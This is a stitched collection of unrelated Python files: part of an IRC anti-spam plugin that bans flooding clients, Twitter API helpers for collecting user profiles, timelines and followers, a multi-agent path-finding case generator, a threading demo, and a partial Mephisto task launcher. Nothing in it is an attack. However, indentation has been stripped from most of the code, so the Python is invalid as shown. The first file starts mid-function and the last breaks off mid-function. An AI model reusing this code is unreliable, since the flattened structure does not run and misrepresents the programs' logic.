protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(msg.prefix, protected):
continue
bad = False
flag = ircdb.makeChannelCapability(channel, 'broken')
if 'tor-sasl' in mask:
continue
if ircdb.checkCapability(msg.prefix, flag):
bad = self.isBadOnChannel(irc,channel,'broken',mask)
if isBanned:
continue
if bad and not i.netsplit:
uid = random.randint(0,1000000)
self.kline(irc,msg.prefix,mask,self.registryValue('brokenDuration'),'%s - %s in %s' % (uid,'join/quit flood',channel),self.registryValue('brokenReason') % self.registryValue('brokenDuration'))
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,'broken client',uid))
isBanned = True
continue
flag = ircdb.makeChannelCapability(channel, 'joinSpamPart')
if ircdb.checkCapability(msg.prefix, flag) and reason == 'Remote host closed the connection':
limit = self.registryValue('joinSpamPartPermit',channel=channel)
if limit > -1:
kind = 'joinSpamPart'
life = self.registryValue('joinSpamPartLife',channel=channel)
key = mask
if kind in chan.buffers and key in chan.buffers[kind] and len(chan.buffers[kind][key]) == limit and msg.nick in chan.nicks and time.time() - chan.nicks[msg.nick][0] < life:
self.isAbuseOnChannel(irc,channel,'joinSpamPart',mask)
if self.hasAbuseOnChannel(irc,channel,'joinSpamPart'):
uid = random.randint(0,1000000)
reason = '(%s/%ss joinSpamPart)' % (limit,life)
klinereason = '%s - %s' % (uid,reason)
if i.defcon:
klinereason = '%s !dnsbl' % reason
self.kline(irc,msg.prefix,mask,self.registryValue('klineDuration'),klinereason)
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid))
isBanned = True
chan.buffers[kind][key].reset()
continue
hosts = self.registryValue('brokenHost',channel=channel)
reasons = ['Read error: Connection reset by peer','Client Quit','Excess Flood','Max SendQ exceeded','Remote host closed the connection']
if 'broken' in chan.buffers and mask in chan.buffers['broken'] and len(chan.buffers['broken'][mask]) > 1 and reason in reasons and len(hosts):
found = False
for h in hosts:
if len(h):
if h.isdigit() and host.startswith(h):
found = True
break
if h in host:
found = True
break
if found and len(chan.nicks[msg.nick]) == 5:
gecos = chan.nicks[msg.nick][3]
account = chan.nicks[msg.nick][4]
if not account and gecos == msg.nick and gecos in ident and len(msg.nick) < 6:
isBanned = True
uid = random.randint(0,1000000)
self.kline(irc,msg.prefix,mask,self.registryValue('brokenDuration')*4,'%s - %s in %s' % (uid,'join/quit flood',channel),self.registryValue('brokenReason') % (self.registryValue('brokenDuration')*4))
self.logChannel(irc,'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,'broken bottish client',uid))
def doNick (self,irc,msg):
oldNick = msg.prefix.split('!')[0]
newNick = msg.args[0]
if oldNick == irc.nick or newNick == irc.nick:
return
newPrefix = '%s!%s' % (newNick,msg.prefix.split('!')[1])
mask = self.prefixToMask(irc,newPrefix)
i = self.getIrc(irc)
if i.netsplit:
return
isBanned = False
for channel in irc.state.channels:
if ircutils.isChannel(channel):
if self.registryValue('ignoreChannel',channel):
continue
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(newPrefix, protected):
continue
chan = self.getChan(irc,channel)
if oldNick in chan.nicks:
chan.nicks[newNick] = chan.nicks[oldNick]
# todo check digit/hexa nicks too
if not newNick.startswith('Guest'):
if not isBanned:
reason = False
if self.registryValue('ignoreRegisteredUser',channel=channel):
if newNick in chan.nicks and len(chan.nicks[newNick]) > 4 and chan.nicks[newNick][4]:
continue
flag = ircdb.makeChannelCapability(channel, 'nick')
if ircdb.checkCapability(msg.prefix, flag):
reason = self.isBadOnChannel(irc,channel,'nick',mask)
hasBeenIgnored = False
ignore = self.registryValue('ignoreDuration',channel=channel)
if ignore > 0:
ts = chan.nicks[newNick][0]
if time.time()-ts > ignore:
hasBeenIgnored = True
if not isCloaked(msg.prefix,self):
if i.defcon or chan.called:
hasBeenIgnored = False
if not reason and i.defcon and self.hasAbuseOnChannel(irc,channel,'nick'):
reason = 'nick changes, due to abuses'
if reason:
if hasBeenIgnored:
bypass = self.isBadOnChannel(irc,channel,'bypassIgnore',mask)
if bypass:
uid = random.randint(0,1000000)
comment = '%s %s' % (reason,bypass)
log = 'BAD: [%s] %s (%s - %s)' % (channel,newPrefix,comment,uid)
self.ban(irc,newNick,newPrefix,mask,self.registryValue('klineDuration'),'%s - %s' % (uid,comment),self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
isBanned = True
else:
self.logChannel(irc,'IGNORED: [%s] %s (%s)' % (channel,newPrefix,reason))
else:
uid = random.randint(0,1000000)
log = 'BAD: [%s] %s (%s - %s)' % (channel,newPrefix,reason,uid)
self.ban(irc,newNick,newPrefix,mask,self.registryValue('klineDuration'),'%s - %s' % (uid,reason),self.registryValue('klineMessage'),log)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
isBanned = True
del chan.nicks[oldNick]
def reset(self):
self._ircs = ircutils.IrcDict()
def die(self):
self.log.info('die() called')
self.cache = {}
try:
conf.supybot.protocols.irc.throttleTime.setValue(1.6)
except:
pass
self._ircs = ircutils.IrcDict()
super().die()
def doError (self,irc,msg):
self._ircs = ircutils.IrcDict()
def makeDb(self, filename):
"""Create a database and connect to it."""
if os.path.exists(filename):
db = sqlite3.connect(filename,timeout=10)
db.text_factory = str
return db
db = sqlite3.connect(filename)
db.text_factory = str
c = db.cursor()
c.execute("""CREATE TABLE patterns (
id INTEGER PRIMARY KEY,
pattern VARCHAR(512) NOT NULL,
regexp INTEGER,
mini INTEGER,
life INTEGER,
operator VARCHAR(512) NOT NULL,
comment VARCHAR(512),
triggered INTEGER,
at TIMESTAMP NOT NULL,
removed_at TIMESTAMP,
removed_by VARCHAR(512)
)""")
db.commit()
c.close()
return db
def getDb(self, irc):
"""Use this to get a database for a specific irc."""
currentThread = threading.currentThread()
if irc not in self.dbCache and currentThread == world.mainThread:
self.dbCache[irc] = self.makeDb(self.makeFilename(irc))
if currentThread != world.mainThread:
db = self.makeDb(self.makeFilename(irc))
else:
db = self.dbCache[irc]
db.isolation_level = None
return db
Class = Sigyn
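# Illustrative sketch (not part of the plugin): makeDb()/getDb() above cache one
# SQLite connection for the main thread and open a fresh connection for every
# other thread, because sqlite3 connections are not safe to share across threads.
# A minimal, self-contained version of that pattern follows; all names here are
# illustrative, not plugin API.
import sqlite3 as _sqlite3
import threading as _threading

_db_cache = {}

def _get_db_sketch(path):
    """Cached connection on the main thread, a fresh connection elsewhere."""
    if _threading.current_thread() is _threading.main_thread():
        if path not in _db_cache:
            _db_cache[path] = _sqlite3.connect(path, timeout=10)
        return _db_cache[path]
    # worker threads must not reuse the main thread's connection
    return _sqlite3.connect(path, timeout=10)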
|
__init__.py
|
import json
import multiprocessing
import os
import requests
from requests_oauthlib import OAuth1
from time import sleep
import tweepy
def get_users_single(x,auth,output_folder):
while(True):
url=f"https://api.twitter.com/1.1/users/lookup.json?user_id={','.join([str(i) for i in x])}"
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
r = requests.get(url = url,headers=headers)
else:
r = requests.get(url = url, auth=auth)
if(r.status_code != 200):
print("sleeping")
url="https://api.twitter.com/1.1/application/rate_limit_status.json?resources=help,users,search,statuses"
while(True):
sleep(30)
try:
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
l = requests.get(url = url,headers=headers).json()
else:
l = requests.get(url = url, auth=auth).json()
if(l["resources"]["users"]["/users/lookup"]["remaining"]!=0):
break;
except:
pass;
continue;
else:
l = r.json()
return(l)
def get_users_single_mp_aux(x,index,auths,output_folder):
n=100
auth=auths[index]
with open(f'{output_folder}/{index}.jsonl', 'w') as outfile:
for i in range(0,len(x),n):
json1=get_users_single(x[i:i+n],auth,output_folder)
json.dump(json1, outfile)
outfile.write('\n')
def get_users(auths,user_ids,output_folder):
if(not os.path.isdir(output_folder)):
print(f"Not a directory: {output_folder}")
return(None)
if(len(auths)==0):
return(None)
if(type(auths[0])!=str):
auths=[OAuth1(auths[i][0],auths[i][1],auths[i][2],auths[i][3]) for i in range(len(auths))]
Process_jobs = []
k=len(auths)
n=(1+len(user_ids)//k)
index=0
for i in range(0,len(user_ids),n):
p = multiprocessing.Process(target = get_users_single_mp_aux, args = (user_ids[i:i+n],index,auths,output_folder))
index+=1
Process_jobs.append(p)
p.start()
for p in Process_jobs:
p.join()
def get_timeline_single(auth,user_id=None,screen_name=None,count=200,trim_user=True,exclude_replies=False,include_rts=True,max_id=None):
l=[1]
ans=[]
while(len(l)!=0):
if(user_id is not None):
url=f"https://api.twitter.com/1.1/statuses/user_timeline.json?user_id={user_id}&count={count}&trim_user={trim_user}&exclude_replies={exclude_replies}&include_rts={include_rts}"
else:
url=f"https://api.twitter.com/1.1/statuses/user_timeline.json?screen_name={screen_name}&count={count}&trim_user={trim_user}&exclude_replies={exclude_replies}&include_rts={include_rts}"
url+="&tweet_mode=extended"
if(max_id is not None):
#print(max_id,"here")
url+=f"&max_id={max_id}"
#r = requests.get(url = url, auth=auth)
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
r = requests.get(url = url,headers=headers)
else:
r = requests.get(url = url, auth=auth)
#print(url)
if(r.status_code == 401):
break;
if(r.status_code != 200):
print("sleeping")
url="https://api.twitter.com/1.1/application/rate_limit_status.json?resources=help,users,search,statuses"
while(True):
sleep(30)
try:
if(type(auth)==str):
l=requests.get(url = url,headers=headers).json()
else:
l=requests.get(url = url, auth=auth).json()
if(l["resources"]["statuses"]["/statuses/user_timeline"]["remaining"]!=0):
break;
except Exception as e:
print(e)
pass;
continue;
else:
l = r.json()
ans.extend(l)
if(len(l)==0 or max_id==l[-1]["id_str"]):
break;
else:
max_id=l[-1]["id_str"]
return(ans)
def get_timeline_single_mp_aux(index,auths,users,output_folder):
auth=auths[index]
with open(f'{output_folder}/{index}.jsonl', 'w') as outfile:
for user_id in users:
try:
json1=get_timeline_single(auth=auth,user_id=user_id)
except:
sleep(30)
continue;
json.dump(json1, outfile)
outfile.write('\n')
def get_timelines(auths,users,output_folder):
if(not os.path.isdir(output_folder)):
print(f"Not a directory: {output_folder}")
return(None)
if(len(auths)==0):
return(None)
if(type(auths[0])!=str):
auths=[OAuth1(auths[i][0],auths[i][1],auths[i][2],auths[i][3]) for i in range(len(auths))]
Process_jobs = []
k=len(auths)
n=(1+len(users)//k)
index=0
for i in range(0,len(users),n):
p = multiprocessing.Process(target = get_timeline_single_mp_aux, args = (index,auths,users[i:i+n],output_folder))
index+=1
Process_jobs.append(p)
p.start()
for p in Process_jobs:
p.join()
def get_followers_aux(auth,screen_name_or_userid,cursor=-1,use_userid=False):
url="https://api.twitter.com/1.1/followers/ids.json"
params={"screen_name":screen_name_or_userid,"count":"5000","cursor":cursor}
if(use_userid):
params={"user_id":screen_name_or_userid,"count":"5000","cursor":cursor}
if(type(auth)==str):
headers = {"Authorization": "Bearer "+auth}
temp=requests.get(url=url,headers=headers,params=params).json()
else:
temp=requests.get(url=url,auth=auth,params=params).json()
if(len(temp["ids"])==0):
return(temp["ids"],None)
else:
return(temp["ids"],temp["next_cursor"])
def get_followers(auths,screen_name_or_userid,max_num=-1,use_userid=False):
cursor=-1
if(len(auths)==0):
return(None)
if(type(auths[0])!=str):
auths=[OAuth1(auths[i][0],auths[i][1],auths[i][2],auths[i][3]) for i in range(len(auths))]
res=[]
index=0
auth=auths[index]
flag=False
while(cursor is not None and (max_num==-1 or max_num>len(res))):
try:
a,cursor=get_followers_aux(auth,screen_name_or_userid,cursor,use_userid)
flag=False
res.extend(a)
print(len(res))
except Exception as e:
print(e)
print("done",len(res))
if(flag):
sleep(30)
else:
flag=True
index+=1
index%=len(auths)
auth=auths[index]
pass;
return(res)
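# Illustrative usage sketch of the helpers above. The credentials, user ids,
# screen name and output folders below are placeholders, not real values; each
# get_* call fans work out across one process per auth.
if __name__ == "__main__":
    auths = [
        ("CONSUMER_KEY", "CONSUMER_SECRET", "ACCESS_TOKEN", "ACCESS_SECRET"),
    ]  # alternatively, a list of bearer-token strings
    user_ids = [12, 13, 15]  # hypothetical numeric user ids
    os.makedirs("users_out", exist_ok=True)
    os.makedirs("timelines_out", exist_ok=True)
    get_users(auths, user_ids, "users_out")          # profiles -> users_out/<i>.jsonl
    get_timelines(auths, user_ids, "timelines_out")  # timelines -> timelines_out/<i>.jsonl
    followers = get_followers(auths, "example_account", max_num=5000)
    print(len(followers))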
|
CasesGenerator.py
|
import os
import sys
import time
import yaml
import random
import signal
import argparse
import itertools
import subprocess
import numpy as np
import cv2
import scipy.io as sio
from multiprocessing import Queue, Pool, Lock, Manager, Process
from os.path import dirname, realpath, pardir
os.system("taskset -p -c 0 %d" % (os.getpid()))
# os.system("taskset -p 0xFFFFFFFF %d" % (os.getpid()))
os.system("taskset -p -c 8-15,24-31 %d" % (os.getpid()))
parser = argparse.ArgumentParser("Input width and #Agent")
parser.add_argument('--map_width', type=int, default=10)
parser.add_argument('--map_density', type=float, default=0.1)
parser.add_argument('--map_complexity', type=float, default=0.01)
parser.add_argument('--num_agents', type=int, default=4)
parser.add_argument('--num_dataset', type=int, default=30000)
args = parser.parse_args()
# set random seed
np.random.seed(1337)
def tf_index2xy(num_col, index):
Id_row = index // num_col
Id_col = np.remainder(index, num_col)
return [Id_row, Id_col]
# return Id_col, Id_row
def tf_xy2index(num_col, i, j):
return i * num_col + j
def handler(signum, frame):
raise Exception("Solution computed by CBS is timeout.")
class CasesGen:
def __init__(self, path_save, path_loadmap, size_map, map_density, map_complexity, num_agents, num_dataset):
self.size_load_map = size_map
self.path_loadmap = path_loadmap
self.map_density = map_density
self.label_density = str(map_density).split('.')[-1]
self.num_agents = num_agents
self.num_data = num_dataset
self.map_complexity = map_complexity
self.path_save = path_save
self.pair_CasesPool = []
self.createFolder()
self.PROCESS_NUMBER = 4
self.timeout = 300
self.task_queue = Queue()
def createFolder(self):
self.dirName_root = self.path_save + 'map{:02d}x{:02d}_density_p{}/{}_Agent/'.format(self.size_load_map[0],self.size_load_map[1],
self.label_density, self.num_agents)
self.dirName_input = self.dirName_root + 'input/'
self.dirName_output = self.dirName_root + 'output/'
try:
# Create target Directory
os.makedirs(self.dirName_root)
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_output)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
try:
# Create target Directory
os.makedirs(self.dirName_input)
os.makedirs(self.dirName_output)
print("Directory ", self.dirName_root, " Created ")
except FileExistsError:
# print("Directory ", dirName, " already exists")
pass
def search_Cases(self, dir):
# make a list of file name of input yaml
list_path = []
assert os.path.isdir(dir), '%s is not a valid directory' % dir
for root, _, fnames in sorted(os.walk(dir)):
for fname in fnames:
if self.is_target_file(fname):
path = os.path.join(root, fname)
list_path.append(path)
return list_path
def is_target_file(self, filename):
DATA_EXTENSIONS = ['.yaml']
return any(filename.endswith(extension) for extension in DATA_EXTENSIONS)
def mapGen(self, width=10, height=10, complexity=0.01, density=0.1):
# Only odd shapes
# world_size = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)
# world_size = ((height // 2) * 2 , (width // 2) * 2 )
world_size = (height, width)
# Adjust complexity and density relative to maze size
# number of components
complexity = int(complexity * (5 * (world_size[0] + world_size[1])))
# size of components
density = int(density * ((world_size[0] // 2) * (world_size[1] // 2)))
# density = int(density * world_size[0] * world_size[1])
# Build actual maze
maze = np.zeros(world_size, dtype=np.int64)
# Make aisles
for i in range(density):
# x, y = np.random.randint(0, world_size[1]), np.random.randint(0, world_size[0])
# pick a random position
x, y = np.random.randint(0, world_size[1] // 2) * 2, np.random.randint(0, world_size[0] // 2) * 2
maze[y, x] = 1
for j in range(complexity):
neighbours = []
if x > 1: neighbours.append((y, x - 2))
if x < world_size[1] - 2: neighbours.append((y, x + 2))
if y > 1: neighbours.append((y - 2, x))
if y < world_size[0] - 2: neighbours.append((y + 2, x))
if len(neighbours):
y_, x_ = neighbours[np.random.randint(0, len(neighbours))]  # np.random.randint excludes the upper bound
if maze[y_, x_] == 0:
maze[y_, x_] = 1
maze[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1
x, y = x_, y_
# print(np.count_nonzero(maze))
return maze
def img_fill(self, im_in, n): # n = binary image threshold
th, im_th = cv2.threshold(im_in, n, 1, cv2.THRESH_BINARY)
# Copy the thresholded image.
im_floodfill = im_th.copy()
# Mask used for flood filling.
# Notice the size needs to be 2 pixels larger than the image.
h, w = im_th.shape[:2]
mask = np.zeros((h + 2, w + 2), np.uint8)
# Floodfill from point (0, 0)
cv2.floodFill(im_floodfill, mask, (0, 0), 255)
# Invert floodfilled image
im_floodfill_inv = cv2.bitwise_not(im_floodfill)
# print(im_floodfill_inv)
# Combine the two images to get the foreground.
fill_image = im_th | im_floodfill_inv
return fill_image
def setup_cases(self, id_random_case):
# Generate only one random unique cases in unique map
map_env_raw = self.mapGen(width=self.size_load_map[0], height=self.size_load_map[1], complexity=self.map_complexity, density=self.map_density)
self.size_load_map = np.shape(map_env_raw)
# use flood-fill to ensure the connectivity of node in maze
map_env = self.img_fill(map_env_raw.astype(np.uint8), 0.5)
array_freespace = np.argwhere(map_env == 0)
num_freespace = array_freespace.shape[0]
array_obstacle = np.transpose(np.nonzero(map_env))
num_obstacle = array_obstacle.shape[0]
print("###### Check Map Size: [{},{}]- density: {} - Actual [{},{}] - #Obstacle: {}".format(self.size_load_map[0], self.size_load_map[1],
self.map_density, self.size_load_map[0],self.size_load_map[1],
num_obstacle))
list_freespace = []
list_obstacle = []
# transfer into list (tuple)
for id_FS in range(num_freespace):
list_freespace.append((array_freespace[id_FS, 0], array_freespace[id_FS, 1]))
for id_Obs in range(num_obstacle):
list_obstacle.append((array_obstacle[id_Obs, 0], array_obstacle[id_Obs, 1]))
pair_CaseSet = []
for id_agents in range(self.num_agents):
ID_cases_agent = random.sample(list_freespace, 2)
pair_CaseSet.append(ID_cases_agent)
pair_agent = list(itertools.combinations(range(self.num_agents), 2))
check_condition = []
for id_pairagent in range(len(pair_agent)):
firstAgent = pair_agent[id_pairagent][0]
secondAgent = pair_agent[id_pairagent][1]
# print("pair", pairset)
if pair_CaseSet[firstAgent][0] == pair_CaseSet[secondAgent][0] or pair_CaseSet[firstAgent][1] == \
pair_CaseSet[secondAgent][1]:
print("Remove pair \t", pair_CaseSet)
check_condition.append(0)
else:
check_condition.append(1)
# pairStore.append(pairset)
# todo: generate n-agent pair start-end position - start from single agent CBS
# todo: non-swap + swap
if sum(check_condition) == len(pair_agent):
# print("Add {}-case: {}".format(id_random_case,pair_CaseSet))
# self.pair_CasesPool.append(pair_CaseSet)
# return True, pair_CaseSet, map_env
return True, pair_CaseSet, list_obstacle
else:
print("Remove cases ID-{}:\t {}".format(id_random_case, pair_CaseSet))
return False, [],[]
def setup_CasePool(self):
pairStore = []
mapStore = []
num_data_exceed = int(self.num_data * 2)
for id_random_case in range(num_data_exceed):
Check_add_item, pair_CaseSet, map_env = self.setup_cases(id_random_case)
if Check_add_item:
pairStore.append(pair_CaseSet)
mapStore.append(map_env)
# [k for k in d if not d[k]]
for initialCong in pairStore:
count_repeat = pairStore.count(initialCong)
if count_repeat > 1:
id_repeat = pairStore.index(initialCong)
pairStore.remove(initialCong)
map_toRemoved = mapStore[id_repeat]
mapStore.remove(map_toRemoved)
print('Repeat cases ID:{} \n{} \nObstacle list: \n{} '.format(id_repeat, initialCong, map_toRemoved))
CasePool = list(zip(pairStore, mapStore))
random.shuffle(CasePool)
random.shuffle(CasePool)
pairPool, mapPool = zip(*CasePool)
self.save_CasePool(pairPool,mapPool)
# self.save_Pair(pairStore)
def save_CasePool(self,pairPool,mapPool):
for id_case in range(len(pairPool)):
inputfile_name = self.dirName_input + \
'input_map{:02d}x{:02d}_ID{:05d}.yaml'.format(self.size_load_map[0], self.size_load_map[1],id_case)
self.dump_yaml(self.num_agents, self.size_load_map[0], self.size_load_map[1],
pairPool[id_case], mapPool[id_case], inputfile_name)
def dump_yaml(self, num_agent, map_width, map_height, agents, obstacle_list, filename):
f = open(filename, 'w')
f.write("map:\n")
f.write(" dimensions: {}\n".format([map_width, map_height]))
f.write(" obstacles:\n")
for id_Obs in range(len(obstacle_list)):
f.write(" - [{}, {}]\n".format(obstacle_list[id_Obs][0],obstacle_list[id_Obs][1]))
f.write("agents:\n")
for n in range(num_agent):
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n][0], agents[n][1]))
# f.write(" - name: agent{}\n start: {}\n goal: {}\n".format(n, agents[n]['start'], agents[n]['goal']))
f.write(" - name: agent{}\n start: [{}, {}]\n goal: [{}, {}]\n".format(n, agents[n][0][0], agents[n][0][1],
agents[n][1][0], agents[n][1][1]))
f.close()
def computeSolution(self):
self.list_Cases_input = self.search_Cases(self.dirName_input)
self.len_pair = len(self.list_Cases_input)
for id_case in range(self.len_pair):
self.task_queue.put(id_case)
time.sleep(0.3)
processes = []
for i in range(self.PROCESS_NUMBER):
# Run Multiprocesses
p = Process(target=self.compute_thread, args=(str(i),))
processes.append(p)
[x.start() for x in processes]
def compute_thread(self, thread_id):
while True:
try:
# print(thread_id)
id_case = self.task_queue.get(block=False)
print('thread {} get task:{}'.format(thread_id,id_case))
self.runExpertSolver(id_case)
# print('thread {} finish task:{}'.format(thread_id, id_case))
except:
# print('thread {} no task, exit'.format(thread_id))
return
def runExpertSolver(self, id_case):
signal.signal(signal.SIGALRM, handler)
signal.alarm(self.timeout)
try:
# load
name_inputfile = self.list_Cases_input[id_case]
id_input_case = name_inputfile.split('_ID')[-1]
name_outputfile = self.dirName_output + 'output_map{:02d}x{:02d}_ID{}.yaml'.format(self.size_load_map[0], self.size_load_map[1], id_input_case)
command_dir = dirname(realpath(__file__))
# print(command_dir)
# command_dir = '/local/scratch/ql295/Data/Project/GraphNeural_Planner/onlineExpert'
command_file = os.path.join(command_dir, "ecbs")
# run ECBS
subprocess.call(
[command_file,
"-i", name_inputfile,
"-o", name_outputfile,
"-w", str(1.1)],
cwd=command_dir)
log_str = 'map{:02d}x{:02d}_{}Agents_#{}'.format(self.size_load_map[0], self.size_load_map[1], self.num_agents, id_input_case)
print('############## Find solution for {} generated ###############'.format(log_str))
with open(name_outputfile) as output_file:
return yaml.safe_load(output_file)
except Exception as e:
print(e)
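# Illustrative sketch: reading back one input case written by dump_yaml() above.
# The file name is a placeholder; the keys (map.dimensions, map.obstacles,
# agents[*].start/goal) mirror what dump_yaml() emits.
def load_case(filename):
    """Return (dimensions, obstacles, agents) parsed from a generated input YAML."""
    with open(filename) as f:
        case = yaml.safe_load(f)
    dimensions = case["map"]["dimensions"]                      # [width, height]
    obstacles = case["map"]["obstacles"]                        # list of [row, col]
    agents = [(a["start"], a["goal"]) for a in case["agents"]]  # per-agent (start, goal)
    return dimensions, obstacles, agents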
if __name__ == '__main__':
# path_loadmap = '/homes/ql295/PycharmProjects/GraphNeural_Planner/ExpertPlanner/MapDataset'
# path_loadmap = '/homes/ql295/Documents/Graph_mapf_dataset/setup/map/'
# path_savedata = '/homes/ql295/Documents/Graph_mapf_dataset/solution/'
# path_savedata = '/local/scratch/ql295/Data/MultiAgentDataset/SolutionTri_ECBS/'
path_loadmap = ''
path_savedata = '/local/scratch/ql295/Data/MultiAgentDataset/Solution_DMap/'
# num_dataset = 10 #16**2
# size_map = (5, 5)
size_map = (args.map_width, args.map_width)
map_density = args.map_density
map_complexity = args.map_complexity
num_agents = args.num_agents
num_dataset = args.num_dataset
dataset = CasesGen(path_savedata, path_loadmap, size_map, map_density, map_complexity, num_agents, num_dataset)
timeout = 300
dataset.setup_CasePool()
time.sleep(10)
dataset.computeSolution()
|
main_thread.py
|
import threading
import time
def myChildThread():
print('Child Thread Starting')
time.sleep(5)
print('Current Thread ------')
print(threading.current_thread())
print('---------------------')
print('Main Thread ---------')
print(threading.main_thread())
print('---------------------')
print('Child Thread Ending')
child = threading.Thread(target=myChildThread)
child.start()
child.join()
'''
Child Thread Starting
Current Thread ------
<Thread(Thread-1 (myChildThread), started 123145577377792)>
---------------------
Main Thread ---------
<_MainThread(MainThread, started 4534658496)>
---------------------
Child Thread Ending
'''
|
task_launcher.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from mephisto.data_model.assignment import (
Assignment,
InitializationData,
AssignmentState,
)
from mephisto.data_model.unit import (
Unit,
SCREENING_UNIT_INDEX,
GOLD_UNIT_INDEX,
COMPENSATION_UNIT_INDEX,
)
from typing import Dict, Optional, List, Any, TYPE_CHECKING, Iterator, Iterable
from tqdm import tqdm # type: ignore
import os
import time
import enum
if TYPE_CHECKING:
from mephisto.data_model.task_run import TaskRun
from mephisto.abstractions.database import MephistoDB
import threading
from mephisto.utils.logger_core import get_logger
import types
logger = get_logger(name=__name__)
UNIT_GENERATOR_WAIT_SECONDS = 10
ASSIGNMENT_GENERATOR_WAIT_SECONDS = 0.5
class GeneratorType(enum.Enum):
NONE = 0
UNIT = 1
ASSIGNMENT = 2
class TaskLauncher:
"""
This class is responsible for managing the process of registering
and launching units, including the steps for pre-processing
data and storing them locally for assignments when appropriate.
"""
def __init__(
self,
db: "MephistoDB",
task_run: "TaskRun",
assignment_data_iterator: Iterable[InitializationData],
max_num_concurrent_units: int = 0,
):
"""Prepare the task launcher to get it ready to launch the assignments"""
self.db = db
self.task_run = task_run
self.assignment_data_iterable = assignment_data_iterator
self.assignments: List[Assignment] = []
self.units: List[Unit] = []
self.provider_type = task_run.get_provider().PROVIDER_TYPE
self.UnitClass = task_run.get_provider().UnitClass
self.max_num_concurrent_units = max_num_concurrent_units
self.launched_units: Dict[str, Unit] = {}
self.unlaunched_units: Dict[str, Unit] = {}
self.keep_launching_units: bool = False
self.finished_generators: bool = False
self.assignment_thread_done: bool = True
self.launch_url: Optional[str] = None
self.unlaunched_units_access_condition = threading.Condition()
if isinstance(self.assignment_data_iterable, types.GeneratorType):
self.generator_type = GeneratorType.ASSIGNMENT
self.assignment_thread_done = False
elif max_num_concurrent_units != 0:
self.generator_type = GeneratorType.UNIT
else:
self.generator_type = GeneratorType.NONE
run_dir = task_run.get_run_dir()
os.makedirs(run_dir, exist_ok=True)
logger.debug(f"type of assignment data: {type(self.assignment_data_iterable)}")
self.units_thread: Optional[threading.Thread] = None
self.assignments_thread: Optional[threading.Thread] = None
def _create_single_assignment(self, assignment_data) -> None:
"""Create a single assignment in the database using its read assignment_data"""
task_run = self.task_run
task_args = task_run.get_task_args()
assignment_id = self.db.new_assignment(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
task_run.task_type,
task_run.provider_type,
task_run.sandbox,
)
assignment = Assignment.get(self.db, assignment_id)
assignment.write_assignment_data(assignment_data)
self.assignments.append(assignment)
unit_count = len(assignment_data.unit_data)
for unit_idx in range(unit_count):
unit = self.UnitClass.new(
self.db, assignment, unit_idx, task_args.task_reward
)
self.units.append(unit)
with self.unlaunched_units_access_condition:
self.unlaunched_units[unit.db_id] = unit
def _try_generating_assignments(
self, assignment_data_iterator: Iterator[InitializationData]
) -> None:
"""Try to generate more assignments from the assignments_data_iterator"""
while not self.finished_generators:
try:
data = next(assignment_data_iterator)
self._create_single_assignment(data)
except StopIteration:
self.assignment_thread_done = True
time.sleep(ASSIGNMENT_GENERATOR_WAIT_SECONDS)
def create_assignments(self) -> None:
"""Create an assignment and associated units for the generated assignment data"""
self.keep_launching_units = True
if self.generator_type != GeneratorType.ASSIGNMENT:
for data in self.assignment_data_iterable:
self._create_single_assignment(data)
else:
assert isinstance(
self.assignment_data_iterable, types.GeneratorType
), "Must have assignment data generator for this"
self.assignments_thread = threading.Thread(
target=self._try_generating_assignments,
args=(self.assignment_data_iterable,),
name="assignment-generator",
)
self.assignments_thread.start()
def generate_units(self):
"""units generator which checks that only 'max_num_concurrent_units' running at the same time,
i.e. in the LAUNCHED or ASSIGNED states"""
while self.keep_launching_units:
units_id_to_remove = []
for db_id, unit in self.launched_units.items():
status = unit.get_status()
if (
status != AssignmentState.LAUNCHED
and status != AssignmentState.ASSIGNED
):
units_id_to_remove.append(db_id)
for db_id in units_id_to_remove:
self.launched_units.pop(db_id)
num_avail_units = self.max_num_concurrent_units - len(self.launched_units)
num_avail_units = (
len(self.unlaunched_units)
if self.max_num_concurrent_units == 0
else num_avail_units
)
units_id_to_remove = []
for i, item in enumerate(self.unlaunched_units.items()):
db_id, unit = item
if i < num_avail_units:
self.launched_units[unit.db_id] = unit
units_id_to_remove.append(db_id)
yield unit
else:
break
with self.unlaunched_units_access_condition:
for db_id in units_id_to_remove:
self.unlaunched_units.pop(db_id)
time.sleep(UNIT_GENERATOR_WAIT_SECONDS)
if not self.unlaunched_units:
break
def _launch_limited_units(self, url: str) -> None:
"""use units' generator to launch limited number of units according to (max_num_concurrent_units)"""
# Continue launching if we haven't pulled the plug, so long as there are currently
# units to launch, or more may come in the future.
while not self.finished_generators and (
len(self.unlaunched_units) > 0 or not self.assignment_thread_done
):
for unit in self.generate_units():
if unit is None:
break
unit.launch(url)
if self.generator_type == GeneratorType.NONE:
break
self.finished_generators = True
def launch_units(self, url: str) -> None:
"""launch any units registered by this TaskLauncher"""
self.launch_url = url
self.units_thread = threading.Thread(
target=self._launch_limited_units, args=(url,), name="unit-generator"
)
self.units_thread.start()
def launch_evaluation_unit(
self, unit_data: Dict[str, Any], unit_type_index: int
) -> "Unit":
"""Launch a specific evaluation unit, used for quality control"""
assert (
self.launch_url is not None
), "Cannot launch an evaluation unit before launching others"
task_run = self.task_run
task_args = task_run.get_task_args()
assignment_id = self.db.new_assignment(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
task_run.task_type,
task_run.provider_type,
task_run.sandbox,
)
data = InitializationData(unit_data, [{}])
assignment = Assignment.get(self.db, assignment_id)
